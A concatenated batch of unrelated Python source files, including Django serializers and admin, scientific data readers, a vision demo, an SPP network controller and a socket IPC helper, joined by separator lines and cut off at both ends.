loadbalancer_id = serializers.UUIDField(required=True)
fields = serializers.CharField(required=False)
class Meta:
model = NoneMeta
fields = ['loadbalancer_id', 'fields']
class DeleteLoadBalancersSerializer(serializers.ModelSerializer):
loadbalancer_id = serializers.UUIDField(required=True)
cascade = serializers.BooleanField(required=False)
class Meta:
model = NoneMeta
fields = ['loadbalancer_id', 'cascade']
class GetBalancersStatisticsSerializer(serializers.ModelSerializer):
loadbalancer_id = serializers.UUIDField(required=True)
class Meta:
model = NoneMeta
fields = ['loadbalancer_id']
class GetBalancersStatusTreeSerializer(serializers.ModelSerializer):
loadbalancer_id = serializers.UUIDField(required=True)
class Meta:
model = NoneMeta
fields = ['loadbalancer_id']
class FailoverBalancersSerializer(serializers.ModelSerializer):
loadbalancer_id = serializers.UUIDField(required=True)
class Meta:
model = NoneMeta
fields = ['loadbalancer_id']
# 负载均衡
class BalancersPoolIdSerializer(serializers.ModelSerializer):
pool_id = serializers.UUIDField(required=True)
class Meta:
model = NoneMeta
fields = ['pool_id']
|
import pytest
import numpy as np
from dftfit.io.siesta import SiestaReader
@pytest.mark.siesta
def test_siesta_reader():
filename = 'd3_o_20ev.xml'
directory = 'test_files/siesta'
calculation = SiestaReader.from_file(directory, filename)
assert np.all(np.isclose(calculation.energy, -104742.133616))
first_row_forces = np.array([-5.014637520260e-1, -4.224890317363e-1, -1.420257672235e-1])
assert np.all(np.isclose(calculation.forces[0], first_row_forces))
eVA32GPa = 160.21766208 # http://greif.geo.berkeley.edu/~driver/conversions.html
GPa2Bar = 1e4 # GPa -> bars
stresses = np.array([
[-2.765925809224e-3, -3.009750267323e-5, 1.171322722617e-4],
[-2.908082457191e-5, -3.180769833963e-3, -1.264574964357e-4],
[1.174490293284e-4, -1.258277686581e-4, -1.767562635815e-3]
]) * eVA32GPa * GPa2Bar
assert np.all(np.isclose(calculation.stress, stresses))
|
import pytest
from dethinker.users.models import User
from dethinker.users.tests.factories import UserFactory
@pytest.fixture(autouse=True)
def media_storage(settings, tmpdir):
settings.MEDIA_ROOT = tmpdir.strpath
@pytest.fixture
def user() -> User:
return UserFactory()
|
# -*- test-case-name: xquotient.test.historic.test_filter3to4 -*-
"""
Stub database generator for version 3 of L{Filter}.
"""
from axiom.test.historic.stubloader import saveStub
from axiom.dependency import installOn
from xquotient.spam import Filter
USE_POSTINI_SCORE = True
POSTINI_THRESHHOLD = 0.5
def createDatabase(store):
installOn(
Filter(store=store, usePostiniScore=USE_POSTINI_SCORE,
postiniThreshhold=POSTINI_THRESHHOLD),
store)
if __name__ == '__main__':
saveStub(createDatabase, 17723)
|
import pandas as pd
import zipfile
from os.path import splitext
import numpy as np
from .timers import Timer
class FixedSizeEventReader:
"""
Reads events from a '.txt' or '.zip' file, and packages the events into
non-overlapping event windows, each containing a fixed number of events.
"""
def __init__(self, path_to_event_file, num_events=10000, start_index=0):
print('Will use fixed size event windows with {} events'.format(num_events))
print('Output frame rate: variable')
self.iterator = pd.read_csv(path_to_event_file, delim_whitespace=True, header=None,
names=['t', 'x', 'y', 'pol'],
dtype={'t': np.float64, 'x': np.int16, 'y': np.int16, 'pol': np.int16},
engine='c',
skiprows=start_index + 1, chunksize=num_events, nrows=None, memory_map=True)
def __iter__(self):
return self
def __next__(self):
with Timer('Reading event window from file'):
event_window = self.iterator.__next__().values
return event_window
class FixedDurationEventReader:
"""
Reads events from a '.txt' or '.zip' file, and packages the events into
non-overlapping event windows, each of a fixed duration.
**Note**: This reader is much slower than the FixedSizeEventReader.
The reason is that the latter can use Pandas' very efficient cunk-based reading scheme implemented in C.
"""
def __init__(self, path_to_event_file, duration_ms=50.0, start_index=0):
print('Will use fixed duration event windows of size {:.2f} ms'.format(duration_ms))
print('Output frame rate: {:.1f} Hz'.format(1000.0 / duration_ms))
file_extension = splitext(path_to_event_file)[1]
assert(file_extension in ['.txt', '.zip'])
self.is_zip_file = (file_extension == '.zip')
if self.is_zip_file: # '.zip'
self.zip_file = zipfile.ZipFile(path_to_event_file)
files_in_archive = self.zip_file.namelist()
assert(len(files_in_archive) == 1) # make sure there is only one text file in the archive
self.event_file = self.zip_file.open(files_in_archive[0], 'r')
else:
self.event_file = open(path_to_event_file, 'r')
# ignore header + the first start_index lines
for i in range(1 + start_index):
self.event_file.readline()
self.last_stamp = None
self.duration_s = duration_ms / 1000.0
def __iter__(self):
return self
def __del__(self):
if self.is_zip_file:
self.zip_file.close()
self.event_file.close()
def __next__(self):
with Timer('Reading event window from file'):
event_list = []
for line in self.event_file:
if self.is_zip_file:
line = line.decode("utf-8")
t, x, y, pol = line.split(' ')
t, x, y, pol = float(t), int(x), int(y), int(pol)
event_list.append([t, x, y, pol])
if self.last_stamp is None:
self.last_stamp = t
if t > self.last_stamp + self.duration_s:
self.last_stamp = t
event_window = np.array(event_list)
return event_window
raise StopIteration
|
from __future__ import print_function
import argparse
import torch
import torch.backends.cudnn as cudnn
import numpy as np
from utils.prior_box import PriorBox
import cv2
from models.model.retinatrack import RetinaTrackNet
from config.config import cfg_re50
from utils.box_utils import decode
import time
import torchvision
import parser
import torch.nn.functional as F
parser = argparse.ArgumentParser(description='RetinaTrack')
parser.add_argument('-m', '--trained_model', default='demo.pth',
type=str, help='Trained state_dict file path to open')
parser.add_argument('--confidence_threshold', default=0.6, type=float, help='confidence_threshold')
parser.add_argument('--nms_threshold', default=0.4, type=float, help='nms_threshold')
parser.add_argument('--vis_thres', default=0.6, type=float, help='visualization_threshold')
parser.add_argument('-image', default='source/test.jpg', help='test image path')
args = parser.parse_args()
if __name__ == '__main__':
cfg = cfg_re50
model = RetinaTrackNet(cfg=cfg).cuda()
param = torch.load('demo.pth', map_location=lambda storage, loc: storage.cuda('cuda:0'))
model.load_state_dict(param)
model.eval()
img_raw = cv2.imread(args.image)
img = cv2.resize(img_raw,(640,640))
_,im_height,im_width= img.shape
img = img.transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
img = torch.from_numpy(img).unsqueeze(0).cuda()
img = img.cuda().float() / 255.0
scale = torch.Tensor([img_raw.shape[1], img_raw.shape[0], img_raw.shape[1], img_raw.shape[0]]).cuda()
tic = time.time()
loc, conf, classifier = model(img) # forward pass
priorbox = PriorBox(cfg)
with torch.no_grad():
priors = priorbox.forward()
priors = priors.cuda()
with torch.no_grad():
boxes = decode(loc.squeeze(0), priors, cfg['variance'])
boxes = boxes * scale
conf = F.softmax(conf, dim=-1)
scores = conf.squeeze(0).cpu().numpy()[:, 1]
inds = np.where(scores > 0.6)[0]
boxes = boxes[inds]
scores = scores[inds]
scores = torch.from_numpy(scores).cuda().unsqueeze(1)
classifier = F.softmax(classifier, dim=-1).squeeze(0)
classifier = classifier.data.max(-1, keepdim=True)[1]
classifier = classifier[inds].float()
dets = torch.cat((boxes,scores,classifier),1)
i = torchvision.ops.boxes.nms(dets[:,:4], dets[:,5], args.nms_threshold)
dets = dets[i]
for b in dets:
if b[4] < args.vis_thres:
continue
text = "car: {:d}".format(int(b[5]))
print(text)
b = list(map(int, b))
cv2.rectangle(img_raw, (b[0], b[1]), (b[2], b[3]), (0, 0, 255), 2)
cx = b[0]
cy = b[1] + 12
cv2.putText(img_raw, text, (cx, cy),
cv2.FONT_HERSHEY_DUPLEX, 0.5, (255, 255, 255))
cv2.imwrite('source/result_img.jpg', img_raw) |
# -*- coding: utf-8 -*-
"""
* TencentBlueKing is pleased to support the open source community by making 蓝鲸智云-蓝鲸 PaaS 平台(BlueKing-PaaS) available.
* Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
* Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
* You may obtain a copy of the License at http://opensource.org/licenses/MIT
* Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
* an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
* specific language governing permissions and limitations under the License.
"""
from apigw_manager.apigw.command import DefinitionCommand
from apigw_manager.apigw.helper import ReleaseVersionManager
from apigw_manager.core.fetch import Fetcher
from apigw_manager.core.release import Releaser
class Command(DefinitionCommand):
"""API gateway release a version"""
default_namespace = "release"
Fetcher = Fetcher
Releaser = Releaser
def add_arguments(self, parser):
super().add_arguments(parser)
parser.add_argument("-t", "--title", default=None, help="resource version title")
parser.add_argument("-c", "--comment", default="", help="release comment")
parser.add_argument("-s", "--stage", default=[], nargs="+", help="release stages")
def _should_create_resource_version(self, resource_version, title):
if not resource_version:
return True
return resource_version.get("title") != title
def get_default_version_title(self, configuration):
manager = ReleaseVersionManager()
return manager.increase(configuration.api_name)
def handle(self, title, comment, stage, *args, **kwargs):
configuration = self.get_configuration(**kwargs)
definition = self.get_definition(**kwargs)
title = title or definition.get("title") or self.get_default_version_title(configuration=configuration)
comment = comment or definition.get("comment", "")
fetcher = self.Fetcher(configuration)
releaser = self.Releaser(configuration)
resource_version = fetcher.latest_resource_version()
if self._should_create_resource_version(resource_version, title):
resource_version = releaser.create_resource_version(title=title, comment=comment)
else:
print("resource_version already exists and is the latest, skip creating")
result = releaser.release(
resource_version_name=resource_version["name"],
comment=comment,
stage_names=stage,
)
print(
"API gateway released %s, title %s, stages %s"
% (result["resource_version_name"], result["resource_version_title"], result["stage_names"])
)
|
#!/usr/bin/env python
# coding: utf-8
r"""STEP morphing example"""
import logging
import pygem as pg
logger = logging.getLogger(__name__)
handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s :: %(levelname)6s :: '
'%(module)20s :: %(lineno)3d :: %(message)s')
handler.setFormatter(formatter)
handler.setLevel(logging.DEBUG)
logger.addHandler(handler)
logger.info("reading parameters")
params = pg.params.FFDParameters()
params.read_parameters(filename='./example_ffd_step/parameters_ffd_step.prm')
step_handler = pg.stephandler.StepHandler()
mesh_points = step_handler.parse('./example_ffd_step/test_pipe.step')
logger.info("show original")
step_handler.show('./example_ffd_step/test_pipe.step')
logger.info("applying transformation")
free_form = pg.freeform.FFD(params, mesh_points)
free_form.perform()
new_mesh_points = free_form.modified_mesh_points
# iges_handler.write(new_mesh_points, './tutorial_2_iges/test_pipe_mod.iges')
logger.info("writing modified file")
step_handler.write(new_mesh_points,
'./example_ffd_step/test_pipe_mod.step',
1e-3)
logger.info("showing modified file")
mesh_points = step_handler.parse('./example_ffd_step/test_pipe_mod.step')
step_handler.show()
|
# SPDX-License-Identifier: BSD-3-Clause
# Copyright(c) 2018 Nippon Telegraph and Telephone Corporation
import eventlet
eventlet.monkey_patch()
import argparse
import errno
import json
import logging
import os
import socket
import subprocess
import spp_proc
import spp_webapi
LOG = logging.getLogger(__name__)
MSG_SIZE = 4096
# relative path of `cpu_layout.py`
CPU_LAYOUT_TOOL = 'tools/helpers/cpu_layout.py'
class Controller(object):
def __init__(self, host, pri_port, sec_port, api_port):
self.web_server = spp_webapi.WebServer(self, host, api_port)
self.procs = {}
self.ip_addr = host
self.init_connection(pri_port, sec_port)
def start(self):
self.web_server.start()
def init_connection(self, pri_port, sec_port):
self.pri_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.pri_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.pri_sock.bind((self.ip_addr, pri_port))
self.pri_sock.listen(1)
self.primary_listen_thread = eventlet.greenthread.spawn(
self.accept_primary)
self.sec_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sec_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sec_sock.bind((self.ip_addr, sec_port))
self.sec_sock.listen(1)
self.secondary_listen_thread = eventlet.greenthread.spawn(
self.accept_secondary)
def accept_primary(self):
while True:
conn, _ = self.pri_sock.accept()
proc = self.procs.get(spp_proc.ID_PRIMARY)
if proc is not None:
LOG.warning("spp_primary reconnect !")
with proc.sem:
try:
proc.conn.close()
except Exception:
pass
proc.conn = conn
# NOTE: when spp_primary restart, all secondarys must be
# restarted. this is out of controle of spp-ctl.
else:
LOG.info("primary connected.")
self.procs[spp_proc.ID_PRIMARY] = spp_proc.PrimaryProc(conn)
def accept_secondary(self):
while True:
conn, _ = self.sec_sock.accept()
LOG.debug("sec accepted: get process id")
proc = self._get_proc(conn)
if proc is None:
LOG.error("get process id failed")
conn.close()
continue
old_proc = self.procs.get(proc.id)
if old_proc:
LOG.warning("%s(%d) reconnect !", old_proc.type, old_proc.id)
if old_proc.type != proc.type:
LOG.warning("type changed ! new type: %s", proc.type)
with old_proc.sem:
try:
old_proc.conn.close()
except Exception:
pass
else:
LOG.info("%s(%d) connected.", proc.type, proc.id)
self.procs[proc.id] = proc
@staticmethod
def _continue_recv(conn):
try:
# must set non-blocking to recieve remining data not to happen
# blocking here.
# NOTE: usually MSG_DONTWAIT flag is used for this purpose but
# this flag is not supported under eventlet.
conn.setblocking(False)
data = b""
while True:
try:
rcv_data = conn.recv(MSG_SIZE)
data += rcv_data
if len(rcv_data) < MSG_SIZE:
break
except socket.error as e:
if e.args[0] == errno.EAGAIN:
# OK, no data remining. this happens when recieve data
# length is just multiple of MSG_SIZE.
break
raise e
return data
finally:
conn.setblocking(True)
@staticmethod
def _send_command(conn, command):
data = None
try:
conn.sendall(command.encode())
data = conn.recv(MSG_SIZE)
if data and len(data) == MSG_SIZE:
# could not receive data at once. recieve remining data.
data += self._continue_recv(conn)
if data:
data = data.decode()
except Exception as e:
LOG.info("Error: {}".format(e))
return data
def _get_proc(self, conn):
# it is a bit ad hoc. send "_get_clinet_id" command and try to
# decode reply for each proc type. if success, that is the type.
data = self._send_command(conn, "_get_client_id")
for proc in [spp_proc.VfProc, spp_proc.NfvProc, spp_proc.MirrorProc,
spp_proc.PcapProc]:
sec_id = proc._decode_client_id(data)
if sec_id is not None:
return proc(sec_id, conn)
def _update_procs(self):
"""Remove no existing processes from `self.procs`."""
removed_ids = []
for idx, proc in self.procs.items():
if proc.id != spp_proc.ID_PRIMARY:
try:
# Check the process can be accessed. If not, go
# to except block.
proc.get_status()
except Exception as e:
LOG.error(e)
removed_ids.append(idx)
for idx in removed_ids:
LOG.info("Remove no existing {}:{}.".format(
self.procs[idx].type, self.procs[idx].id))
del self.procs[idx]
def get_processes(self):
procs = []
self._update_procs()
for proc in self.procs.values():
p = {"type": proc.type}
if proc.id != spp_proc.ID_PRIMARY:
p["client-id"] = proc.id
procs.append(p)
return procs
def get_cpu_usage(self):
"""Get cpu usage from each of status of SPP processes.
If process returns invalid message or cannot connect, remove
it from `self.procs` as in _update_procs().
"""
removed_ids = []
cpus = []
for idx, proc in self.procs.items():
try:
# Check the process can be accessed. If not, go
# to except block.
stat = proc.get_status()
if proc.id == spp_proc.ID_PRIMARY:
cpus.append(
{'proc-type': proc.type,
'master-lcore': stat['lcores'][0],
'lcores': stat['lcores']})
elif proc.type == 'nfv':
cpus.append(
{'proc-type': proc.type,
'client-id': proc.id,
'master-lcore': stat['master-lcore'],
'lcores': stat['lcores']})
elif proc.type in ['vf', 'mirror', 'pcap']:
master_lcore = stat['info']['master-lcore']
lcores = [stat['info']['master-lcore']]
# TODO(yasufum) revise tag name 'core'.
for val in stat['info']['core']:
lcores.append(val['core'])
cpus.append(
{'proc-type': proc.type,
'client-id': proc.id,
'master-lcore': master_lcore,
'lcores': lcores})
else:
LOG.debug('No supported proc type: {}'.format(
roc.type))
except Exception as e:
LOG.error("get_cpu_usage: {}".format(e))
removed_ids.append(idx)
for idx in removed_ids:
LOG.info("Remove no existing {}:{}.".format(
self.procs[idx].type, self.procs[idx].id))
del self.procs[idx]
return cpus
def get_cpu_layout(self):
"""Get cpu layout with helper tool 'cpu_layout.py'."""
# This script is 'src/spp-ctl/spp_ctl.py' and it expect to find
# the tool in tools/helpers/cpu_layout.py'.
cmd_path = "{}/../../{}".format(
os.path.dirname(__file__), CPU_LAYOUT_TOOL)
if os.path.exists(cmd_path):
# Get cpu layout as bytes of JSON foramtted string
cmd_res = subprocess.check_output(
[cmd_path, '--json'], # required '--json' option
stderr=subprocess.STDOUT)
# Decode bytes to str
return json.loads(cmd_res.decode('utf-8'))
else:
LOG.error("'{}' cannot be found.".format(CPU_LAYOUT_TOOL))
return None
def do_exit(self, proc_type, proc_id):
removed_id = None # remove proc info of ID from self.procs
for proc in self.procs.values():
if proc.type == proc_type and proc.id == proc_id:
removed_id = proc.id
break
if removed_id is not None:
del self.procs[removed_id]
def main():
parser = argparse.ArgumentParser(description="SPP Controller")
parser.add_argument("-b", '--bind-addr', type=str, default='localhost',
help="bind address, default=localhost")
parser.add_argument("-p", dest='pri_port', type=int, default=5555,
action='store', help="primary port, default=5555")
parser.add_argument("-s", dest='sec_port', type=int, default=6666,
action='store', help="secondary port, default=6666")
parser.add_argument("-a", dest='api_port', type=int, default=7777,
action='store', help="web api port, default=7777")
args = parser.parse_args()
logging.basicConfig(level=logging.DEBUG)
controller = Controller(args.bind_addr, args.pri_port, args.sec_port,
args.api_port)
controller.start()
|
import numpy as np
class Stats:
def __init__(self, workers, total_requests, total_time_sec, times, error_count):
self.workers = workers
self.total_requests = total_requests
self.total_time_sec = total_time_sec
self.times = times
self.error_count = error_count
def print(self):
print('----' * 5)
print(f'Done! Took {self.total_time_sec} seconds')
print(f'Number of invokes: {self.total_requests}; Number of workers: {self.workers}')
err_rate = round(self.error_count / self.total_requests * 100, 2)
print(f'Error rate: {err_rate}% ({self.error_count}/{self.total_requests})')
throughput = self.total_requests / self.total_time_sec
print(f'Throughput: {throughput} req/sec')
print('----' * 5)
print(f'Max: {np.percentile(self.times, 100)}ms')
print(f'Min: {np.percentile(self.times, 0)}ms')
print(f'Average: {np.average(self.times)}ms')
print(f'Median: {np.percentile(self.times, 50)}ms')
print(f'Upper 90: {np.percentile(self.times, 90)}ms')
print(f'Upper 99: {np.percentile(self.times, 99)}ms')
print(f'STD: {np.std(self.times)}')
print('----' * 10)
print('----' * 10)
print()
|
from .boolalg import (to_cnf, to_dnf, to_nnf, And, Or, Not, Xor, Nand, Nor, Implies,
Equivalent, ITE, POSform, SOPform, simplify_logic,
bool_equal, bool_map, true, false)
from .inference import satisfiable
|
# -*- coding: utf-8 -*-
from classes.om import ObjectManager
from classes.ui import UIManager
#
from classes.om import Well
from classes.om import DataIndex
from classes.om import DataIndexMap
from classes.om import Log
from classes.om import CurveSet
from classes.om import Seismic
from classes.om import Spectogram
from classes.om import Gather
#
from classes.ui import FrameController, Frame
from classes.ui import DialogController, Dialog
from classes.ui import LASHeaderController, LASHeader
from classes.ui import WellImportFrameController, WellImportFrame
from classes.ui import MainWindowController, MainWindow
from classes.ui import MenuBarController, MenuBarView
from classes.ui import MenuController, MenuView
from classes.ui import MenuItemController, MenuItemView
from classes.ui import TreeController, TreeView
from classes.ui import ToolBarController, ToolBar
from classes.ui import ToolBarToolController
from classes.ui import StatusBarController, StatusBar
from classes.ui import WellPlotController, WellPlot
from classes.ui import TrackController, TrackView
from classes.ui import TrackObjectController
from classes.ui import NavigatorController, Navigator
from classes.ui import CrossPlotController, CrossPlot
from classes.ui import WorkPageController, WorkPage
from classes.ui import \
LineRepresentationController, LineRepresentationView
from classes.ui import \
IndexRepresentationController, IndexRepresentationView
from classes.ui import \
DensityRepresentationController, DensityRepresentationView
from classes.ui import \
PatchesRepresentationController, PatchesRepresentationView
# ContourfRepresentationController, ContourfRepresentationView
from classes.ui import WellPlotEditorController, \
WellPlotEditor
from classes.ui import LPEWellPlotPanelController, \
LPEWellPlotPanel
from classes.ui import LPETrackPanelController, \
LPETrackPanel
from classes.ui import LPEObjectsPanelController, \
LPEObjectsPanel
#
from classes.ui import PropertyGridController, PropertyGridView
#
from classes.ui import CanvasPlotterController, CanvasPlotter
from classes.ui import TrackCanvasController, TrackCanvas
from classes.ui import TrackLabelController, TrackLabel
#
from classes.ui import \
ObjectPropertiesDialogController, ObjectPropertiesDialog
from classes.ui import ConsoleController, Console
def register_app_classes():
register_OM_classes()
register_UIManager_classes()
def register_OM_classes():
ObjectManager.register_class(Well)
ObjectManager.register_class(CurveSet, Well)
ObjectManager.register_class(DataIndex, CurveSet)
ObjectManager.register_class(Log, CurveSet)
#
ObjectManager.register_class(Seismic)
ObjectManager.register_class(DataIndex, Seismic)
ObjectManager.register_class(DataIndexMap, Seismic)
#
ObjectManager.register_class(DataIndexMap, Log)
#
ObjectManager.register_class(Gather, Well)
ObjectManager.register_class(DataIndex, Gather)
ObjectManager.register_class(DataIndexMap, Gather)
#
ObjectManager.register_class(Spectogram, Well)
ObjectManager.register_class(DataIndex, Spectogram)
ObjectManager.register_class(DataIndexMap, Spectogram)
ObjectManager.register_class(Spectogram, Log)
ObjectManager.register_class(Spectogram, Gather)
ObjectManager.register_class(Spectogram, Seismic)
#
"""
# ObjectManager.register_class(IndexSet, Well)
ObjectManager.register_class(Core, Well)
#
#
ObjectManager.register_class(Partition, Well)
ObjectManager.register_class(Part, Partition)
ObjectManager.register_class(Property, Partition)
ObjectManager.register_class(Property, Part)
ObjectManager.register_class(Partition) #remover apos alterar pra rocktbale
ObjectManager.register_class(RockTable)
ObjectManager.register_class(RockType, RockTable)
ObjectManager.register_class(Inference, Well)
ObjectManager.register_class(Part, Inference)
ObjectManager.register_class(Rock) #remover apos alterar pra rocktbale
ObjectManager.register_class(Rock, Partition) #remover apos alterar pra rocktbale
ObjectManager.register_class(Rock, Well) #remover apos alterar pra rocktbale
ObjectManager.register_class(Fluid)
#
ObjectManager.register_class(Seismic)
# ObjectManager.register_class(IndexSet, Seismic)
#
ObjectManager.register_class(Scalogram, Seismic)
ObjectManager.register_class(DataIndex, Scalogram)
# ObjectManager.register_class(IndexSet, Scalogram)
#
ObjectManager.register_class(DataIndex, WellGather)
# ObjectManager.register_class(IndexSet, WellGather)
ObjectManager.register_class(GatherSpectogram, Well)
ObjectManager.register_class(DataIndex, GatherSpectogram)
# ObjectManager.register_class(IndexSet, GatherSpectogram)
#
ObjectManager.register_class(GatherScalogram, Well)
ObjectManager.register_class(DataIndex, GatherScalogram)
# ObjectManager.register_class(IndexSet, GatherScalogram)
#
ObjectManager.register_class(Rock, Well)
ObjectManager.register_class(Fluid, Well)
#
# ObjectManager.register_class(DataIndex, IndexSet)
ObjectManager.register_class(Model1D, Well)
ObjectManager.register_class(DataIndex, Model1D)
#
# ObjectManager.register_class(IndexSet, Model1D)
#
ObjectManager.register_class(ZoneSet, Well)
ObjectManager.register_class(Zone, ZoneSet)
ObjectManager.register_class(Property, Zone)
#
"""
def register_UIManager_classes():
UIManager.register_class(FrameController, Frame)
UIManager.register_class(DialogController, Dialog)
UIManager.register_class(MainWindowController, MainWindow)
UIManager.register_class(MenuBarController, MenuBarView, MainWindowController)
UIManager.register_class(MenuController, MenuView, MenuBarController)
UIManager.register_class(MenuController, MenuView, MenuController)
UIManager.register_class(MenuItemController, MenuItemView, MenuController)
UIManager.register_class(ToolBarController, ToolBar, MainWindowController)
UIManager.register_class(ToolBarToolController, None, ToolBarController)
UIManager.register_class(TreeController, TreeView, MainWindowController)
UIManager.register_class(StatusBarController, StatusBar, MainWindowController)
#
UIManager.register_class(WorkPageController, WorkPage, MainWindowController)
UIManager.register_class(WorkPageController, WorkPage, FrameController)
#
UIManager.register_class(WellPlotController, WellPlot, MainWindowController)
UIManager.register_class(WellPlotController, WellPlot, FrameController)
#
UIManager.register_class(CrossPlotController, CrossPlot, MainWindowController)
UIManager.register_class(CrossPlotController, CrossPlot, FrameController)
#
UIManager.register_class(ConsoleController, Console, MainWindowController)
UIManager.register_class(ConsoleController, Console, FrameController)
#
UIManager.register_class(TrackController, TrackView, WellPlotController)
UIManager.register_class(TrackObjectController, None,
TrackController
)
UIManager.register_class(WellPlotEditorController, WellPlotEditor,
WellPlotController
)
#
UIManager.register_class(NavigatorController, Navigator,
TrackObjectController
)
#
UIManager.register_class(LineRepresentationController,
LineRepresentationView, TrackObjectController
)
UIManager.register_class(IndexRepresentationController,
IndexRepresentationView, TrackObjectController
)
UIManager.register_class(DensityRepresentationController,
DensityRepresentationView, TrackObjectController
)
UIManager.register_class(PatchesRepresentationController,
PatchesRepresentationView, TrackObjectController
)
# UIManager.register_class(ContourfRepresentationController,
# ContourfRepresentationView, TrackObjectController
# )
#
UIManager.register_class(LPEWellPlotPanelController, LPEWellPlotPanel,
WellPlotEditorController
)
UIManager.register_class(LPETrackPanelController, LPETrackPanel,
WellPlotEditorController
)
UIManager.register_class(LPEObjectsPanelController, LPEObjectsPanel,
WellPlotEditorController
)
UIManager.register_class(PropertyGridController,
PropertyGridView, LPEObjectsPanelController
)
#
UIManager.register_class(CanvasPlotterController, CanvasPlotter, CrossPlotController)
#
UIManager.register_class(FrameController, Frame, MainWindowController)
#
UIManager.register_class(TrackCanvasController, TrackCanvas, TrackController)
UIManager.register_class(TrackLabelController, TrackLabel, TrackController)
#
UIManager.register_class(ObjectPropertiesDialogController,
ObjectPropertiesDialog)
UIManager.register_class(PropertyGridController,
PropertyGridView, ObjectPropertiesDialogController
)
UIManager.register_class(PropertyGridController,
PropertyGridView, LPEWellPlotPanelController
)
#
# UIManager.register_class(DataMaskController, DataMask, TrackObjectController)
UIManager.register_class(LASHeaderController, LASHeader)
#
UIManager.register_class(WellImportFrameController, WellImportFrame, MainWindowController)
|
from django.contrib import admin
from . import models
class QuestionAdmin(admin.ModelAdmin):
list_display = ('content', 'answer', 'category',
'created_at', 'updated_at')
list_filter = ('category', 'created_at')
search_fields = ('content',)
# Limit the dropdown choices of category to user that created them
def formfield_for_foreignkey(self, db_field, request, **kwargs):
if db_field.name == "category":
kwargs["queryset"] = models.Category.objects.filter(
user=request.user)
return super(QuestionAdmin, self).formfield_for_foreignkey(
db_field, request, **kwargs)
class CategoryAdmin(admin.ModelAdmin):
# Show only categories that the
def get_queryset(self, request):
return models.Category.objects.filter(user=request.user)
admin.site.register(models.Category, CategoryAdmin)
admin.site.register(models.Question, QuestionAdmin)
|
from mergeit.extras.filters import RedmineFilter
class VersionRedmineFilter(RedmineFilter):
def run(self, source_match, source_branch, target_branch):
task = self.get_task(source_match.groupdict()['task_id']) # TODO: compare commit message task with branch name?
return target_branch.format(redmine_version=task['fixed_version']['name']) |
# -*- coding: utf-8 -*-
# Copyright (C) 2014, Almar Klein
""" Simple IPC based on a persistent socket pair.
"""
import os
import sys
import time
import socket
import threading
# Python 2.x and 3.x compatibility
if sys.version_info[0] >= 3:
string_types = str,
else:
string_types = basestring,
## Constants
# Use a relatively small buffer size, to keep the channels better in sync
SOCKET_BUFFERS_SIZE = 10*1024
# Minimum timout
TIMEOUT_MIN = 0.5
# For the status
STATUS_CLOSED = 0
STATUS_CLOSING = 1
STATUS_WAITING = 2
STATUS_HOSTING = 3
STATUS_CONNECTED = 4
## Functions and the class
def port_hash(name):
""" port_hash(name)
Given a string, returns a port number between 49152 and 65535.
(2**14 (16384) different posibilities)
This range is the range for dynamic and/or private ports
(ephemeral ports) specified by iana.org.
The algorithm is deterministic, thus providing a way to map names
to port numbers.
"""
fac = 0xd2d84a61
val = 0
for c in name:
val += ( val>>3 ) + ( ord(c)*fac )
val += (val>>3) + (len(name)*fac)
return 49152 + (val % 2**14)
class Connection(object):
def __init__(self):
# Timeout value (if no data is received for this long,
# the timedout signal is fired). Because we do not know the timeout
# that the other side uses, we apply a minimum timeout.
self._timeout = TIMEOUT_MIN
self._set_status(0)
def _get_hostname_and_port(self, address):
# Check
if not isinstance(address, string_types):
raise ValueError("Address should be a string.")
if not ":" in address:
raise ValueError("Address should be in format 'host:port'.")
host, port = address.split(':')
# Process host
if host.lower() == 'localhost':
host = '127.0.0.1'
if host.lower() == 'publichost':
host = 'publichost' + '0'
if host.lower().startswith('publichost') and host[10:].isnumeric():
index = int(host[10:])
hostname = socket.gethostname()
tmp = socket.gethostbyname_ex(hostname)
try:
host = tmp[2][index] # This resolves to 127.0.1.1 on some Linuxes
except IndexError:
raise ValueError('Invalid index (%i) in public host addresses.' % index)
# Process port
try:
port = int(port)
except ValueError:
port = port_hash(port)
if port > 2**16:
raise ValueError("The port must be in the range [0, 2^16>.")
return host, port
def _set_status(self, status, bsd_socket=None):
""" _connected(status, bsd_socket=None)
This method is called when a connection is made.
Private method to apply the bsd_socket.
Sets the socket and updates the status.
Also instantiates the IO threads.
"""
# Update hostname and port number; for hosting connections the port
# may be different if max_tries > 0. Each client connection will be
# assigned a different ephemeral port number.
# http://www.tcpipguide.com/free/t_TCPPortsConnectionsandConnectionIdentification-2.htm
# Also get hostname and port for other end
if bsd_socket is not None:
if True:
self._hostname1, self._port1 = bsd_socket.getsockname()
if status != STATUS_WAITING:
self._hostname2, self._port2 = bsd_socket.getpeername()
assert status in (STATUS_CLOSED, STATUS_CLOSING, STATUS_WAITING,
STATUS_HOSTING, STATUS_CONNECTED)
self._status = status
if status in [STATUS_HOSTING, STATUS_CONNECTED]:
# Really connected
# Store socket
self._bsd_socket = bsd_socket
# Set socket to non-blocking mode
bsd_socket.setblocking(False)
# # Create and start io threads
# self._sendingThread = SendingThread(self)
# self._receivingThread = ReceivingThread(self)
# #
# self._sendingThread.start()
# self._receivingThread.start()
if status == STATUS_CLOSED:
# Close bsd socket
try:
self._bsd_socket.shutdown()
except Exception:
pass
try:
self._bsd_socket.close()
except Exception:
pass
self._bsd_socket = None
#
# # Remove references to threads
# self._sendingThread = None
# self._receivingThread = None
@property
def is_waiting(self):
""" Get whether this connection instance is waiting for a connection.
This is the state after using bind() and before another context
connects to it.
"""
return self._status == 2
def bind(self, address, max_tries=1):
""" Bind the bsd socket. Launches a dedicated thread that waits
for incoming connections and to do the handshaking procedure.
"""
hostname, port = self._get_hostname_and_port(address)
# Create socket.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Set buffer size to be fairly small (less than 10 packages)
